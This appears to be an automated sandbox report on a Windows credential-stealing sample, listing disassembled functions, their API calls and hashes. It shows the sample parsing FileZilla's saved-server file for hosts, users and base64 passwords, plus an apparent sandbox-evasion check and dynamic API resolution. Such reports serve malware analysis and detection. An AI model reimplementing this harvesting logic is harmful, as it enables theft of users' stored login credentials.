                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                          • String ID:
                                                                                          • API String ID: 362916592-0
                                                                                          • Opcode ID: ebf191636fdab90f45f19ccd6af6600c11bec1d160f4b14778d2533b0a03f9df
                                                                                          • Instruction ID: e353cc71a305f1a8f1a8746e49c408d3a80ec80c51124973b3d8e1cf6413b4f4
                                                                                          • Opcode Fuzzy Hash: ebf191636fdab90f45f19ccd6af6600c11bec1d160f4b14778d2533b0a03f9df
                                                                                          • Instruction Fuzzy Hash: 4111E1B1E05618EBEB20CF54DC45FA9B779FB00720F10039AF50A932D0C7785A85CB55
                                                                                          Function 004172F0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417320
                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417327
                                                                                          • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041733F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocNameProcessUser
                                                                                          • String ID:
                                                                                          • API String ID: 1206570057-0
                                                                                          • Opcode ID: 964d200717a0df2f3f62487d6067e07b9107b608128a919957ff18d07be4aa47
                                                                                          • Instruction ID: d97db1a59c4db881a004fd13fa95f43a4b4e799dc382b7b3ddd968380e0460c3
                                                                                          • Opcode Fuzzy Hash: 964d200717a0df2f3f62487d6067e07b9107b608128a919957ff18d07be4aa47
                                                                                          • Instruction Fuzzy Hash: B6F04FB1944648AFC710DF98DD45BAEBBB9FB08B21F10021AFA15A3690C7745545CBA1
                                                                                          Function 00401160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004164B7,00420ADA), ref: 0040116A
                                                                                          • ExitProcess.KERNEL32 ref: 0040117E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExitInfoProcessSystem
                                                                                          • String ID:
                                                                                          • API String ID: 752954902-0
                                                                                          • Opcode ID: fb17d3f43d2abce587f83b1d922277e93116013ddf9f148f75be850ad6644e92
                                                                                          • Instruction ID: 6710e554edad90447a57410479f56be173a40300ace114c8cd68aa34356edfab
                                                                                          • Opcode Fuzzy Hash: fb17d3f43d2abce587f83b1d922277e93116013ddf9f148f75be850ad6644e92
                                                                                          • Instruction Fuzzy Hash: 17D05E74D0020CDBCB14DFE09A49ADDBB7AAB0D321F001656ED0572240DA305446CA65
                                                                                          Function 00407750 Relevance: 81.6, APIs: 54, Instructions: 584stringmemoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetProcessHeap.KERNEL32(00000000,0098967F,?,00415CA4,?), ref: 00407764
                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,00415CA4,?), ref: 0040776B
                                                                                          • lstrcat.KERNEL32(?,008174A8), ref: 0040791B
                                                                                          • lstrcat.KERNEL32(?,?), ref: 0040792F
                                                                                          • lstrcat.KERNEL32(?,?), ref: 00407943
                                                                                          • lstrcat.KERNEL32(?,?), ref: 00407957
                                                                                          • lstrcat.KERNEL32(?,0081A7D8), ref: 0040796B
                                                                                          • lstrcat.KERNEL32(?,0081A940), ref: 0040797F
                                                                                          • lstrcat.KERNEL32(?,0081A6D0), ref: 00407992
                                                                                          • lstrcat.KERNEL32(?,0081A820), ref: 004079A6
                                                                                          • lstrcat.KERNEL32(?,00817530), ref: 004079BA
                                                                                          • lstrcat.KERNEL32(?,?), ref: 004079CE
                                                                                          • lstrcat.KERNEL32(?,?), ref: 004079E2
                                                                                          • lstrcat.KERNEL32(?,?), ref: 004079F6
                                                                                          • lstrcat.KERNEL32(?,0081A7D8), ref: 00407A09
                                                                                          • lstrcat.KERNEL32(?,0081A940), ref: 00407A1D
                                                                                          • lstrcat.KERNEL32(?,0081A6D0), ref: 00407A31
                                                                                          • lstrcat.KERNEL32(?,0081A820), ref: 00407A44
                                                                                          • lstrcat.KERNEL32(?,0081BA50), ref: 00407A58
                                                                                          • lstrcat.KERNEL32(?,?), ref: 00407A6C
                                                                                          • lstrcat.KERNEL32(?,?), ref: 00407A80
                                                                                          • lstrcat.KERNEL32(?,?), ref: 00407A94
                                                                                          • lstrcat.KERNEL32(?,0081A7D8), ref: 00407AA8
                                                                                          • lstrcat.KERNEL32(?,0081A940), ref: 00407ABB
                                                                                          • lstrcat.KERNEL32(?,0081A6D0), ref: 00407ACF
                                                                                          • lstrcat.KERNEL32(?,0081A820), ref: 00407AE3
                                                                                          • lstrcat.KERNEL32(?,0081BAB8), ref: 00407AF6
                                                                                          • lstrcat.KERNEL32(?,?), ref: 00407B0A
                                                                                          • lstrcat.KERNEL32(?,?), ref: 00407B1E
                                                                                          • lstrcat.KERNEL32(?,?), ref: 00407B32
                                                                                          • lstrcat.KERNEL32(?,0081A7D8), ref: 00407B46
                                                                                          • lstrcat.KERNEL32(?,0081A940), ref: 00407B5A
                                                                                          • lstrcat.KERNEL32(?,0081A6D0), ref: 00407B6D
                                                                                          • lstrcat.KERNEL32(?,0081A820), ref: 00407B81
                                                                                          • lstrcat.KERNEL32(?,0081BB20), ref: 00407B95
                                                                                          • lstrcat.KERNEL32(?,?), ref: 00407BA9
                                                                                          • lstrcat.KERNEL32(?,?), ref: 00407BBD
                                                                                          • lstrcat.KERNEL32(?,?), ref: 00407BD1
                                                                                          • lstrcat.KERNEL32(?,0081A7D8), ref: 00407BE4
                                                                                          • lstrcat.KERNEL32(?,0081A940), ref: 00407BF8
                                                                                          • lstrcat.KERNEL32(?,0081A6D0), ref: 00407C0C
                                                                                          • lstrcat.KERNEL32(?,0081A820), ref: 00407C1F
                                                                                          • lstrcat.KERNEL32(?,0081BB88), ref: 00407C33
                                                                                          • lstrcat.KERNEL32(?,?), ref: 00407C47
                                                                                          • lstrcat.KERNEL32(?,?), ref: 00407C5B
                                                                                          • lstrcat.KERNEL32(?,?), ref: 00407C6F
                                                                                          • lstrcat.KERNEL32(?,0081A7D8), ref: 00407C83
                                                                                          • lstrcat.KERNEL32(?,0081A940), ref: 00407C96
                                                                                          • lstrcat.KERNEL32(?,0081A6D0), ref: 00407CAA
                                                                                          • lstrcat.KERNEL32(?,0081A820), ref: 00407CBE
                                                                                            • Part of subcall function 00407610: lstrcat.KERNEL32(334A4020,004217A0), ref: 00407646
                                                                                            • Part of subcall function 00407610: lstrcat.KERNEL32(334A4020,00000000), ref: 00407688
                                                                                            • Part of subcall function 00407610: lstrcat.KERNEL32(334A4020, : ), ref: 0040769A
                                                                                            • Part of subcall function 00407610: lstrcat.KERNEL32(334A4020,00000000), ref: 004076CF
                                                                                            • Part of subcall function 00407610: lstrcat.KERNEL32(334A4020,004217A8), ref: 004076E0
                                                                                            • Part of subcall function 00407610: lstrcat.KERNEL32(334A4020,00000000), ref: 00407713
                                                                                            • Part of subcall function 00407610: lstrcat.KERNEL32(334A4020,004217AC), ref: 0040772D
                                                                                            • Part of subcall function 00407610: task.LIBCPMTD ref: 0040773B
                                                                                          • lstrcat.KERNEL32(?,0081C728), ref: 00407E4B
                                                                                          • lstrcat.KERNEL32(?,0081B6F8), ref: 00407E5E
                                                                                          • lstrlenA.KERNEL32(334A4020), ref: 00407E6B
                                                                                          • lstrlenA.KERNEL32(334A4020), ref: 00407E7B
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
                                                                                          • String ID:
                                                                                          • API String ID: 928082926-0
                                                                                          • Opcode ID: ff1f90b81e100b1bf67056f39f8342891eb5238e5d64d8528918a30350bb3cf0
                                                                                          • Instruction ID: 1e9b08135f7dcdfaa8f2c2dd520ea7fbbb4c73797e410f6fed26cf7179196423
                                                                                          • Opcode Fuzzy Hash: ff1f90b81e100b1bf67056f39f8342891eb5238e5d64d8528918a30350bb3cf0
                                                                                          • Instruction Fuzzy Hash: 8B3264B2C00615ABCB25EBA0DC89DDE773DAB48704F444A9DF60962090EE79E7C5CF64
                                                                                          Function 00410090 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 363stringmemoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 825 410090-410122 call 41a110 call 418880 call 41a2f0 call 41a270 call 41a1d0 * 2 call 41a380 call 41a270 call 41a1d0 call 41a170 call 409a10 847 410127-41012c 825->847 848 410132-410149 call 4188d0 847->848 849 410566-410579 call 41a1d0 call 401550 847->849 848->849 855 41014f-4101af strtok_s call 41a110 * 4 GetProcessHeap HeapAlloc 848->855 865 4101b2-4101b6 855->865 866 4104ca-410561 lstrlenA call 41a170 call 401590 call 414c70 call 41a1d0 memset call 41a410 * 4 call 41a1d0 * 4 865->866 867 4101bc-4101cd StrStrA 865->867 866->849 869 410206-410217 StrStrA 867->869 870 4101cf-410201 lstrlenA call 418380 call 41a270 call 41a1d0 867->870 872 410250-410261 StrStrA 869->872 873 410219-41024b lstrlenA call 418380 call 41a270 call 41a1d0 869->873 870->869 877 410263-410295 lstrlenA call 418380 call 41a270 call 41a1d0 872->877 878 41029a-4102ab StrStrA 872->878 873->872 877->878 884 4102b1-410303 lstrlenA call 418380 call 41a270 call 41a1d0 call 41a4a0 call 409b10 878->884 885 410339-41034b call 41a4a0 lstrlenA 878->885 884->885 926 410305-410334 call 41a1f0 call 41a380 call 41a270 call 41a1d0 884->926 899 410351-410363 call 41a4a0 lstrlenA 885->899 900 4104af-4104c5 strtok_s 885->900 899->900 912 410369-41037b call 41a4a0 lstrlenA 899->912 900->865 912->900 921 410381-410393 call 41a4a0 lstrlenA 912->921 921->900 930 410399-4104aa lstrcat * 3 call 41a4a0 lstrcat * 2 call 41a4a0 lstrcat * 3 call 41a4a0 lstrcat * 3 call 41a4a0 lstrcat * 3 call 41a1f0 * 4 921->930 926->885 930->900
                                                                                          APIs
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                            • Part of subcall function 00418880: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 004188AB
                                                                                            • Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
                                                                                            • Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352
                                                                                            • Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5
                                                                                            • Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
                                                                                            • Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
                                                                                            • Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2
                                                                                            • Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6
                                                                                            • Part of subcall function 00409A10: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409A3C
                                                                                            • Part of subcall function 00409A10: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A61
                                                                                            • Part of subcall function 00409A10: LocalAlloc.KERNEL32(00000040,?), ref: 00409A81
                                                                                            • Part of subcall function 00409A10: ReadFile.KERNEL32(000000FF,?,00000000,00410127,00000000), ref: 00409AAA
                                                                                            • Part of subcall function 00409A10: LocalFree.KERNEL32(00410127), ref: 00409AE0
                                                                                            • Part of subcall function 00409A10: CloseHandle.KERNEL32(000000FF), ref: 00409AEA
                                                                                            • Part of subcall function 004188D0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004188F2
                                                                                          • strtok_s.MSVCRT ref: 0041015B
                                                                                          • GetProcessHeap.KERNEL32(00000000,000F423F,00420DA6,00420DA3,00420DA2,00420D9F), ref: 004101A2
                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420D9E), ref: 004101A9
                                                                                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 004101C5
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 004101D3
                                                                                            • Part of subcall function 00418380: malloc.MSVCRT ref: 00418388
                                                                                            • Part of subcall function 00418380: strncpy.MSVCRT ref: 004183A3
                                                                                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 0041020F
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0041021D
                                                                                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00410259
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00410267
                                                                                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 004102A3
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 004102B5
                                                                                          • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420D9E), ref: 00410342
                                                                                          • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041035A
                                                                                          • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410372
                                                                                          • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041038A
                                                                                          • lstrcat.KERNEL32(?,browser: FileZilla), ref: 004103A2
                                                                                          • lstrcat.KERNEL32(?,profile: null), ref: 004103B1
                                                                                          • lstrcat.KERNEL32(?,url: ), ref: 004103C0
                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 004103D3
                                                                                          • lstrcat.KERNEL32(?,0042161C), ref: 004103E2
                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 004103F5
                                                                                          • lstrcat.KERNEL32(?,00421620), ref: 00410404
                                                                                          • lstrcat.KERNEL32(?,login: ), ref: 00410413
                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 00410426
                                                                                          • lstrcat.KERNEL32(?,0042162C), ref: 00410435
                                                                                          • lstrcat.KERNEL32(?,password: ), ref: 00410444
                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 00410457
                                                                                          • lstrcat.KERNEL32(?,0042163C), ref: 00410466
                                                                                          • lstrcat.KERNEL32(?,00421640), ref: 00410475
                                                                                          • strtok_s.MSVCRT ref: 004104B9
                                                                                          • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420D9E), ref: 004104CE
                                                                                          • memset.MSVCRT ref: 0041051D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                                                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                                                                          • API String ID: 337689325-555421843
                                                                                          • Opcode ID: f13308eb13abeb77900b74efdbd0cfce152486b44370018a659c36fec8b67708
                                                                                          • Instruction ID: f2c119995f801d95b771d97b8d40ebd85ad32e2919b54f786426441ea9706e1a
                                                                                          • Opcode Fuzzy Hash: f13308eb13abeb77900b74efdbd0cfce152486b44370018a659c36fec8b67708
                                                                                          • Instruction Fuzzy Hash: BBD1A571A00108ABCB04EBF1DC4AEEE7739AF54314F50851EF103A7191DF78AA95CB69
                                                                                          Function 00419270 Relevance: 61.5, APIs: 33, Strings: 2, Instructions: 212libraryloaderCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 960 419270-419284 call 419160 963 4194a3-419502 LoadLibraryA * 5 960->963 964 41928a-41949e call 419190 GetProcAddress * 21 960->964 966 419504-419518 GetProcAddress 963->966 967 41951d-419524 963->967 964->963 966->967 969 419556-41955d 967->969 970 419526-419551 GetProcAddress * 2 967->970 971 419578-41957f 969->971 972 41955f-419573 GetProcAddress 969->972 970->969 973 419581-419594 GetProcAddress 971->973 974 419599-4195a0 971->974 972->971 973->974 975 4195d1-4195d2 974->975 976 4195a2-4195cc GetProcAddress * 2 974->976 976->975
                                                                                          APIs
                                                                                          • GetProcAddress.KERNEL32(76210000,007F6C40), ref: 004192B1
                                                                                          • GetProcAddress.KERNEL32(76210000,007F6C58), ref: 004192CA
                                                                                          • GetProcAddress.KERNEL32(76210000,007F6C70), ref: 004192E2
                                                                                          • GetProcAddress.KERNEL32(76210000,007F6C88), ref: 004192FA
                                                                                          • GetProcAddress.KERNEL32(76210000,007F6D18), ref: 00419313
                                                                                          • GetProcAddress.KERNEL32(76210000,00816A40), ref: 0041932B
                                                                                          • GetProcAddress.KERNEL32(76210000,00814678), ref: 00419343
                                                                                          • GetProcAddress.KERNEL32(76210000,00814898), ref: 0041935C
                                                                                          • GetProcAddress.KERNEL32(76210000,007F6CB8), ref: 00419374
                                                                                          • GetProcAddress.KERNEL32(76210000,007F6D48), ref: 0041938C
                                                                                          • GetProcAddress.KERNEL32(76210000,00816FB8), ref: 004193A5
                                                                                          • GetProcAddress.KERNEL32(76210000,00816E08), ref: 004193BD
                                                                                          • GetProcAddress.KERNEL32(76210000,008146F8), ref: 004193D5
                                                                                          • GetProcAddress.KERNEL32(76210000,008170C0), ref: 004193EE
                                                                                          • GetProcAddress.KERNEL32(76210000,00816EF8), ref: 00419406
                                                                                          • GetProcAddress.KERNEL32(76210000,00814698), ref: 0041941E
                                                                                          • GetProcAddress.KERNEL32(76210000,00816E80), ref: 00419437
                                                                                          • GetProcAddress.KERNEL32(76210000,00816E50), ref: 0041944F
                                                                                          • GetProcAddress.KERNEL32(76210000,008148B8), ref: 00419467
                                                                                          • GetProcAddress.KERNEL32(76210000,00816FA0), ref: 00419480
                                                                                          • GetProcAddress.KERNEL32(76210000,008148D8), ref: 00419498
                                                                                          • LoadLibraryA.KERNEL32(00816F28,?,004164A0), ref: 004194AA
                                                                                          • LoadLibraryA.KERNEL32(00816F58,?,004164A0), ref: 004194BB
                                                                                          • LoadLibraryA.KERNEL32(00816F40,?,004164A0), ref: 004194CD
                                                                                          • LoadLibraryA.KERNEL32(00817000,?,004164A0), ref: 004194DF
                                                                                          • LoadLibraryA.KERNEL32(00817078,?,004164A0), ref: 004194F0
                                                                                          • GetProcAddress.KERNEL32(75B30000,00816FD0), ref: 00419512
                                                                                          • GetProcAddress.KERNEL32(751E0000,00816EE0), ref: 00419533
                                                                                          • GetProcAddress.KERNEL32(751E0000,00816FE8), ref: 0041954B
                                                                                          • GetProcAddress.KERNEL32(76910000,00816E20), ref: 0041956D
                                                                                          • GetProcAddress.KERNEL32(75670000,008146B8), ref: 0041958E
                                                                                          • GetProcAddress.KERNEL32(77310000,00816AD0), ref: 004195AF
                                                                                          • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 004195C6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                          • String ID: Fs$NtQueryInformationProcess
                                                                                          • API String ID: 2238633743-1241331114
                                                                                          • Opcode ID: 3c4f576e88d1023c8c64455e8d299a229b8a4e9f9ed258e654ba581a00c5eb17
                                                                                          • Instruction ID: 826a308167d33dd6e89c68d84aa8ae535e40b86c028b310e96c4c1ecb1cfdbe7
                                                                                          • Opcode Fuzzy Hash: 3c4f576e88d1023c8c64455e8d299a229b8a4e9f9ed258e654ba581a00c5eb17
                                                                                          • Instruction Fuzzy Hash: D3A171B5500A00EFC764DF68ED88E1E3BBBBB4C361B50A51AEA05C3674D7349843DBA5
                                                                                          Function 00405150 Relevance: 53.1, APIs: 22, Strings: 8, Instructions: 569stringnetworkmemoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
